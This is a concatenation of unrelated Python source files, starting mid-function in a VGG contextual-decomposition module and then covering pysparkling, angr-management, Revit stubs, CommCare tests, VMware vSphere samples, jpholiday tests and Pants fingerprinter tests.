# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
return relevant, irrelevant
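# Illustrative sketch of the loop form mentioned in the comment above (not part of the
# original file): assuming the VGG feature extractor is an nn.Sequential of
# Conv2d/ReLU/MaxPool2d/AdaptiveAvgPool2d/Dropout layers, the explicit layer-by-layer
# calls in cd_vgg_features could be collapsed into a single dispatch loop, mirroring cd().
def _cd_features_loop_sketch(relevant, irrelevant, feature_modules, model_type='vgg'):
    for mod in feature_modules:
        t = str(type(mod))
        if 'Conv2d' in t or 'Linear' in t:
            relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mod)
        elif 'ReLU' in t:
            relevant, irrelevant = propagate_relu(relevant, irrelevant, mod)
        elif 'MaxPool2d' in t:
            relevant, irrelevant = propagate_pooling(relevant, irrelevant, mod, model_type=model_type)
        elif 'AdaptiveAvgPool2d' in t:
            relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mod)
        elif 'Dropout' in t:
            relevant, irrelevant = propagate_dropout(relevant, irrelevant, mod)
    return relevant, irrelevant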
def cd_vgg_classifier(relevant, irrelevant, im_torch, model, model_type='vgg'):
# set up model
model.eval()
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[4])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[6])
# only interested in not cancer, which is class 0
#model.train()
return relevant, irrelevant
def cd_track_vgg(blob, im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
# (classifier): Sequential(
# (0): Linear(in_features=25088, out_features=4096)
# (1): ReLU(inplace)
# (2): Dropout(p=0.5)
# (3): Linear(in_features=4096, out_features=4096)
# (4): ReLU(inplace)
# (5): Dropout(p=0.5)
# (6): Linear(in_features=4096, out_features=1000)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[33])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[34])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[35])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[36])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[37])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[38])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[39])
return relevant, irrelevant
|
pysparkling/sql/expressions/literals.py | ptallada/pysparkling | 260 | 20996 | from ..utils import AnalysisException
from .expressions import Expression
class Literal(Expression):
def __init__(self, value):
super().__init__()
self.value = value
def eval(self, row, schema):
return self.value
def __str__(self):
if self.value is True:
return "true"
if self.value is False:
return "false"
if self.value is None:
return "NULL"
return str(self.value)
def get_literal_value(self):
if hasattr(self.value, "expr") or isinstance(self.value, Expression):
raise AnalysisException("Value should not be a Column or an Expression,"
f" but got {type(self)}: {self}")
return self.value
def args(self):
return (self.value, )
__all__ = ["Literal"]
|
samples/cordic/cordic_golden.py | hj424/heterocl | 236 | 21018 |
import numpy as np
golden = np.array([
[100.0, 100.0],
[206.226840616, 179.610387213],
[1190.25124092, 1197.15702025],
[1250.76639667, 1250.3933971],
[1261.76760093, 1250.17718583],
[1237.4846285, 1237.56490579],
[1273.56730356, 1266.82141705],
[1272.899992, 1259.92589118],
[1.17000308922e-06, 1.21115462165e-06],
[4.69048419035e-08, 5.61093645301e-08],
[1.50244060584e-09, 2.44292250731e-09],
[8.47391624349e-11, 1.15593790738e-10],
[5.10649970307e-12, 4.80114236959e-12],
[8.34326950279e-13, 4.1368839091e-13],
[3.66142109259e-14, 4.95319932219e-14],
[8.20801944862e-15, 4.94154683061e-14]])
|
angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 474 | 21059 | from functools import partial
from typing import Callable
from typing import TYPE_CHECKING
from ...config import Conf
from .menu import Menu, MenuEntry, MenuSeparator
if TYPE_CHECKING:
from ...ui.views.disassembly_view import DisassemblyView
class DisasmInsnContextMenu(Menu):
"""
Disassembly instruction's context menu items and callback functions.
It provides the context menu for disassembly instructions in the Disassembly View.
For adding items in plugins, use `Workspace.add_disasm_insn_ctx_menu_entry`
and `Workspace.remove_disasm_insn_ctx_menu_entry`.
"""
def __init__(self, disasm_view: 'DisassemblyView'):
super().__init__("", parent=disasm_view)
self.insn_addr = None
self.entries.extend([
MenuEntry('T&oggle selection', self._toggle_instruction_selection),
MenuSeparator(),
MenuEntry('&XRefs...', self._popup_xrefs),
MenuSeparator(),
])
if Conf.has_operation_mango:
self.entries.extend([
MenuEntry("&Depends on...", self._popup_dependson_dialog),
MenuSeparator(),
])
self.entries.extend([
MenuEntry('E&xecute symbolically...', self._popup_newstate_dialog),
MenuEntry('&Avoid in execution...', self._avoid_in_execution),
MenuEntry('&Find in execution...', self._find_in_execution),
MenuEntry('Add &hook...', self._add_hook),
MenuEntry('View function &documentation...', self._view_docs)
])
@property
def _disasm_view(self) -> 'DisassemblyView':
return self.parent
def _popup_newstate_dialog(self):
self._disasm_view.popup_newstate_dialog(async_=True)
def _popup_dependson_dialog(self):
self._disasm_view.popup_dependson_dialog(use_operand=True)
def _toggle_instruction_selection(self):
self._disasm_view.infodock.toggle_instruction_selection(self.insn_addr)
def _avoid_in_execution(self):
self._disasm_view.avoid_addr_in_exec(self.insn_addr)
self._disasm_view.refresh()
def _find_in_execution(self):
self._disasm_view.find_addr_in_exec(self.insn_addr)
self._disasm_view.refresh()
def _add_hook(self):
self._disasm_view.popup_hook_dialog(async_=True)
def _view_docs(self):
if self._disasm_view is None:
return
addr = self._disasm_view._address_in_selection()
if addr is not None:
self._disasm_view.popup_func_doc_dialog(addr)
def _popup_xrefs(self):
if self._disasm_view is None or self._disasm_view._flow_graph is None:
return
r = self._disasm_view._flow_graph.get_selected_operand_info()
if r is not None:
_, ins_addr, operand = r
self._disasm_view.parse_operand_and_popup_xref_dialog(ins_addr, operand, async_=True)
#
# Public Methods
#
def add_menu_entry(self, text, callback: Callable[['DisasmInsnContextMenu'], None], add_separator_first=True):
if add_separator_first:
self.entries.append(MenuSeparator())
self.entries.append(MenuEntry(text, partial(callback, self)))
def remove_menu_entry(self, text, remove_preceding_separator=True):
for idx, m in enumerate(self.entries):
if not isinstance(m, MenuEntry):
continue
if m.caption == text:
self.entries.remove(m)
if remove_preceding_separator:
self.entries.pop(idx-1)
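# Usage sketch (illustrative, not part of the original file): plugins normally go
# through Workspace.add_disasm_insn_ctx_menu_entry, which presumably delegates to
# add_menu_entry above. The callback receives the menu instance, so the clicked
# instruction address is available as menu.insn_addr. `ctx_menu` below is hypothetical.
#
# def _my_entry(menu: 'DisasmInsnContextMenu') -> None:
#     print("instruction at %#x" % menu.insn_addr)
#
# ctx_menu.add_menu_entry('My &plugin action...', _my_entry)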
|
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/AnalyticalModelStick.py | htlcnn/ironpython-stubs | 182 | 21079 | class AnalyticalModelStick(AnalyticalModel,IDisposable):
"""
An element that represents a stick in the structural analytical model.
Could be one of beam,brace or column type.
"""
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
def GetAlignmentMethod(self,selector):
"""
GetAlignmentMethod(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> AnalyticalAlignmentMethod
Gets the alignment method for a given selector.
selector: End of the analytical model.
Returns: The alignment method at a given end.
"""
pass
def getBoundingBox(self,*args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
def GetLocalCoordinateSystem(self,*__args):
"""
GetLocalCoordinateSystem(self: AnalyticalModelStick,point: XYZ) -> Transform
Gets the local coordinate system (LCS) reflects analytical model orientation at
the specified point.
point: The point on the analytical model stick element.
Returns: Transformation matrix.
x - longitudinal axis,y - transversal,section -
horizontal,strong axis,z - transversal,section - vertical,weak axis,origin
- base point of LCS.
GetLocalCoordinateSystem(self: AnalyticalModelStick,parameter: float) -> Transform
Gets the local coordinate system (LCS) reflects analytical model orientation at
the specified parameter value along a curve.
parameter: The parameter value along a curve that should be in the range [0,1],where 0
represents start and 1 represents end of the element.
Returns: Transformation matrix.
x - longitudinal axis,y - transversal,section -
horizontal,strong axis,z - transversal,section - vertical,weak axis,origin
- base point of LCS.
"""
pass
def GetMemberForces(self):
"""
GetMemberForces(self: AnalyticalModelStick) -> IList[MemberForces]
Gets the member forces associated with this element.
Returns: Returns a collection of Member Forces associated with this element. Empty
collection will be returned if element doesn't have any Member Forces.
To
find out with which end member forces are associated use
Autodesk::Revit::DB::Structure::MemberForces::Position
property to obtain a
position of Member Forces on element.
"""
pass
def GetProjectionPlaneY(self,selector):
"""
GetProjectionPlaneY(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> ElementId
Retrieves analytical model projection information for Y direction.
selector: End of the analytical model.
Returns: Plane on to which analytical model is projected,or invalidElementId if
not
projected to a Plane.
"""
pass
def GetProjectionPlaneZ(self,selector):
"""
GetProjectionPlaneZ(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> ElementId
Retrieves analytical model projection information for Z direction.
selector: End of the analytical model.
Returns: Plane on to which analytical model is projected,or invalidElementId if
not
projected to a Plane.
"""
pass
def GetProjectionY(self,selector):
"""
GetProjectionY(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> StickElementProjectionY
Retrieves analytical model projection information for Y direction.
selector: End of the analytical model.
Returns: Indicates if the projection is a preset value,or refers to a Plane.
"""
pass
def GetProjectionZ(self,selector):
"""
GetProjectionZ(self: AnalyticalModelStick,selector: AnalyticalElementSelector) -> StickElementProjectionZ
Retrieves analytical model projection information for Z direction.
selector: End of the analytical model.
Returns: Indicates if the projection is a preset value,or refers to a Plane.
"""
pass
def GetReleases(self,start,fx,fy,fz,mx,my,mz):
"""
GetReleases(self: AnalyticalModelStick,start: bool) -> (bool,bool,bool,bool,bool,bool)
Gets the releases of element.
start: The position on analytical model stick element. True for start,false for end.
"""
pass
def GetReleaseType(self,start):
"""
GetReleaseType(self: AnalyticalModelStick,start: bool) -> ReleaseType
Gets the release type.
start: The position on analytical model stick element. True for start,false for end.
Returns: The type of release.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def RemoveAllMemberForces(self):
"""
RemoveAllMemberForces(self: AnalyticalModelStick) -> bool
Removes all member forces associated with element.
Returns: True if any member forces were removed,false otherwise.
"""
pass
def RemoveMemberForces(self,start):
"""
RemoveMemberForces(self: AnalyticalModelStick,start: bool) -> bool
Removes member forces defined for given position.
start: Member Forces position on analytical model stick element. True for start,false
for end.
Returns: True if member forces for provided position were removed,false otherwise.
"""
pass
def SetAlignmentMethod(self,selector,method):
"""
SetAlignmentMethod(self: AnalyticalModelStick,selector: AnalyticalElementSelector,method: AnalyticalAlignmentMethod)
Sets the alignment method for a given selector.
selector: End of the analytical model.
method: The alignment method at a given end.
"""
pass
def setElementType(self,*args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def SetMemberForces(self,*__args):
"""
SetMemberForces(self: AnalyticalModelStick,start: bool,force: XYZ,moment: XYZ)
Adds Member Forces to element.
start: Member Forces position on analytical model stick element. True for start,false
for end.
force: The translational forces at specified position of the element.
The x value
of XYZ object represents force along x-axis of the analytical model coordinate
system,y along y-axis,z along z-axis respectively.
moment: The rotational forces at specified position of the element.
The x value of
XYZ object represents moment about x-axis of the analytical model coordinate
system,y about y-axis,z about z-axis respectively.
SetMemberForces(self: AnalyticalModelStick,memberForces: MemberForces)
Sets Member Forces to element.
memberForces: End to which member forces will be added is defined by setting
Autodesk::Revit::DB::Structure::MemberForces::Position
property in provided
Member Forces object.
"""
pass
def SetProjection(self,selector,*__args):
"""
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,planeIdY: ElementId,projectionZ: StickElementProjectionZ)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
planeIdY: Plane on to which analytical model may be projected in Y direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
projectionZ: Preset value for Analytical Model Stick projection Z.
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,projectionY: StickElementProjectionY,projectionZ: StickElementProjectionZ)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
projectionY: Preset value for Analytical Model Stick projection Y.
projectionZ: Preset value for Analytical Model Stick projection Z.
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,planeIdY: ElementId,planeIdZ: ElementId)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
planeIdY: Plane on to which analytical model may be projected in Y direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
planeIdZ: Plane on to which analytical model may be projected in Z direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
SetProjection(self: AnalyticalModelStick,selector: AnalyticalElementSelector,projectionY: StickElementProjectionY,planeIdZ: ElementId)
Sets the analytical model projection to a preset value.
selector: End of the analytical model.
projectionY: Preset value for Analytical Model Stick projection Y.
planeIdZ: Plane on to which analytical model may be projected in Z direction.
Plane
identifies a Level,a Grid,or a Ref Plane.
"""
pass
def SetReleases(self,start,fx,fy,fz,mx,my,mz):
"""
SetReleases(self: AnalyticalModelStick,start: bool,fx: bool,fy: bool,fz: bool,mx: bool,my: bool,mz: bool)
Sets the releases of element.
start: The position on analytical model stick element. True for start,false for end.
"""
pass
def SetReleaseType(self,start,releaseType):
"""
SetReleaseType(self: AnalyticalModelStick,start: bool,releaseType: ReleaseType)
Sets the release type.
start: The position on analytical model stick element. True for start,false for end.
releaseType: The type of release.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
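# Usage sketch (illustrative, based only on the signatures documented above; the
# variable names are hypothetical):
#   fx, fy, fz, mx, my, mz = stick.GetReleases(True)   # releases at the start end
#   stick.SetReleases(True, fx, fy, fz, mx, my, mz)
#   lcs = stick.GetLocalCoordinateSystem(0.5)          # LCS at the curve midpoint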
|
custom/abt/reports/tests/test_fixture_utils.py | dimagilg/commcare-hq | 471 | 21090 | import doctest
from nose.tools import assert_equal, assert_true
from corehq.apps.fixtures.models import (
FieldList,
FixtureDataItem,
FixtureItemField,
)
from custom.abt.reports import fixture_utils
from custom.abt.reports.fixture_utils import (
dict_values_in,
fixture_data_item_to_dict,
)
def test_dict_values_in_param_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, None)
assert_true(result)
def test_dict_values_in_param_empty():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {})
assert_true(result)
def test_dict_values_in_value_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {'permutation': None})
assert_true(result)
def test_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='789abc',
properties={}
)
]
),
'name': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='John',
properties={'lang': 'en'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jan',
properties={'lang': 'nld'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jean',
properties={'lang': 'fra'}
),
]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': '789abc',
'name': 'John'
})
def test_empty_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[]
),
'name': FieldList(
doc_type='FieldList',
field_list=[]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': None,
'name': None,
})
def test_doctests():
results = doctest.testmod(fixture_utils)
assert results.failed == 0
|
cosypose/simulator/__init__.py | ompugao/cosypose | 202 | 21112 |
from .body import Body
from .camera import Camera
from .base_scene import BaseScene
from .caching import BodyCache, TextureCache
from .textures import apply_random_textures
|
samples/vsphere/vcenter/setup/datacenter.py | restapicoding/VMware-SDK | 589 | 21116 |
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2016-2018. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
from com.vmware.vcenter_client import (Datacenter, Folder)
def folder_list_datacenter_folder(context):
return context.client.vcenter.Folder.list(Folder.FilterSpec(type=Folder.Type.DATACENTER))
def detect_datacenter(context, datacenter_name):
"""Find the datacenter with the given name"""
names = set([datacenter_name])
datacenter_summaries = context.client.vcenter.Datacenter.list(
Datacenter.FilterSpec(names=names))
if len(datacenter_summaries) > 0:
datacenter = datacenter_summaries[0].datacenter
print("Detected Datacenter '{}' as {}".
format(datacenter_name, datacenter))
context.testbed.entities['DATACENTER_IDS'][datacenter_name] = datacenter
return True
else:
print("Datacenter '{}' missing".format(datacenter_name))
return False
def detect_datacenters(context):
"""Find datacenters to run the vcenter samples"""
context.testbed.entities['DATACENTER_IDS'] = {}
# Look for the two datacenters
datacenter1_name = context.testbed.config['DATACENTER1_NAME']
datacenter2_name = context.testbed.config['DATACENTER2_NAME']
return (detect_datacenter(context, datacenter1_name) and
detect_datacenter(context, datacenter2_name))
def cleanup_datacenters(context):
"""Cleanup datacenters after sample run"""
# Look for the two datacenters
datacenter1_name = context.testbed.config['DATACENTER1_NAME']
datacenter2_name = context.testbed.config['DATACENTER2_NAME']
names = set([datacenter1_name, datacenter2_name])
datacenter_summaries = context.client.vcenter.Datacenter.list(
Datacenter.FilterSpec(names=names))
print("Found {} Datacenters matching names {}".
format(len(datacenter_summaries), ", ".
join(["'{}'".format(n) for n in names])))
for datacenter_summary in datacenter_summaries:
datacenter = datacenter_summary.datacenter
print("Deleting Datacenter '{}' ({})".
format(datacenter, datacenter_summary.name))
context.client.vcenter.Datacenter.delete(datacenter, force=True)
def setup_datacenters(context):
"""Create datacenters for running vcenter samples"""
# Find a Folder in which to put the Datacenters
folder_summaries = folder_list_datacenter_folder(context)
folder = folder_summaries[0].folder
print("Creating datacenters in Folder '{}' ({})".
format(folder, folder_summaries[0].name))
# Create first datacenter
datacenter1_name = context.testbed.config['DATACENTER1_NAME']
datacenter1 = context.client.vcenter.Datacenter.create(
Datacenter.CreateSpec(name=datacenter1_name, folder=folder)
)
print("Created Datacenter '{}' ({})".format(datacenter1, datacenter1_name))
# Create second datacenter
datacenter2_name = context.testbed.config['DATACENTER2_NAME']
datacenter2 = context.client.vcenter.Datacenter.create(
Datacenter.CreateSpec(name=datacenter2_name, folder=folder)
)
print("Created Datacenter '{}' ({})".format(datacenter2, datacenter2_name))
# Save datacenter name to identifier mappings for later use
context.testbed.entities['DATACENTER_IDS'] = {
datacenter1_name: datacenter1,
datacenter2_name: datacenter2
}
def cleanup(context):
cleanup_datacenters(context)
def setup(context):
setup_datacenters(context)
def validate(context):
return detect_datacenters(context)
|
tests/test_year_2018.py | l0pht511/jpholiday | 179 | 21148 |
# coding: utf-8
import datetime
import unittest
import jpholiday
class TestYear2018(unittest.TestCase):
def test_holiday(self):
"""
2018 holidays
"""
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 1, 1)), '元日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 1, 8)), '成人の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 2, 11)), '建国記念の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 2, 12)), '建国記念の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 3, 21)), '春分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 4, 29)), '昭和の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 4, 30)), '昭和の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 5, 3)), '憲法記念日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 5, 4)), 'みどりの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 5, 5)), 'こどもの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 7, 16)), '海の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 8, 11)), '山の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 9, 17)), '敬老の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 9, 23)), '秋分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 9, 24)), '秋分の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 10, 8)), '体育の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 11, 3)), '文化の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 11, 23)), '勤労感謝の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 12, 23)), '天皇誕生日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2018, 12, 24)), '天皇誕生日 振替休日')
def test_count_month(self):
"""
        Number of holidays in each month of 2018.
"""
self.assertEqual(len(jpholiday.month_holidays(2018, 1)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 2)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 3)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 4)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 5)), 3)
self.assertEqual(len(jpholiday.month_holidays(2018, 6)), 0)
self.assertEqual(len(jpholiday.month_holidays(2018, 7)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 8)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 9)), 3)
self.assertEqual(len(jpholiday.month_holidays(2018, 10)), 1)
self.assertEqual(len(jpholiday.month_holidays(2018, 11)), 2)
self.assertEqual(len(jpholiday.month_holidays(2018, 12)), 2)
def test_count_year(self):
"""
        Number of holidays in 2018.
"""
self.assertEqual(len(jpholiday.year_holidays(2018)), 20)
|
src/python/pants/option/options_fingerprinter_test.py | bastianwegge/pants | 1,806 | 21158 | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import Path
import pytest
from pants.option.custom_types import (
DictValueComponent,
ListValueComponent,
UnsetBool,
dict_with_files_option,
dir_option,
file_option,
)
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner()
def test_fingerprint_dict() -> None:
d1 = {"b": 1, "a": 2}
d2 = {"a": 2, "b": 1}
d3 = {"a": 1, "b": 2}
fp1, fp2, fp3 = (
OptionsFingerprinter().fingerprint(DictValueComponent.create, d) for d in (d1, d2, d3)
)
assert fp1 == fp2
assert fp1 != fp3
def test_fingerprint_dict_with_non_string_keys() -> None:
d = {("a", 2): (3, 4)}
fp = OptionsFingerprinter().fingerprint(DictValueComponent.create, d)
assert fp == "3852a094612ce1c22c08ee2ddcdc03d09e87ad97"
def test_fingerprint_list() -> None:
l1 = [1, 2, 3]
l2 = [1, 3, 2]
fp1, fp2 = (OptionsFingerprinter().fingerprint(ListValueComponent.create, l) for l in (l1, l2))
assert fp1 != fp2
def test_fingerprint_file(rule_runner: RuleRunner) -> None:
fp1, fp2, fp3 = (
OptionsFingerprinter().fingerprint(file_option, rule_runner.write_files({f: c})[0])
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
("spam/egg.config", "blah blah blah"),
)
)
assert fp1 != fp2
assert fp1 != fp3
assert fp2 != fp3
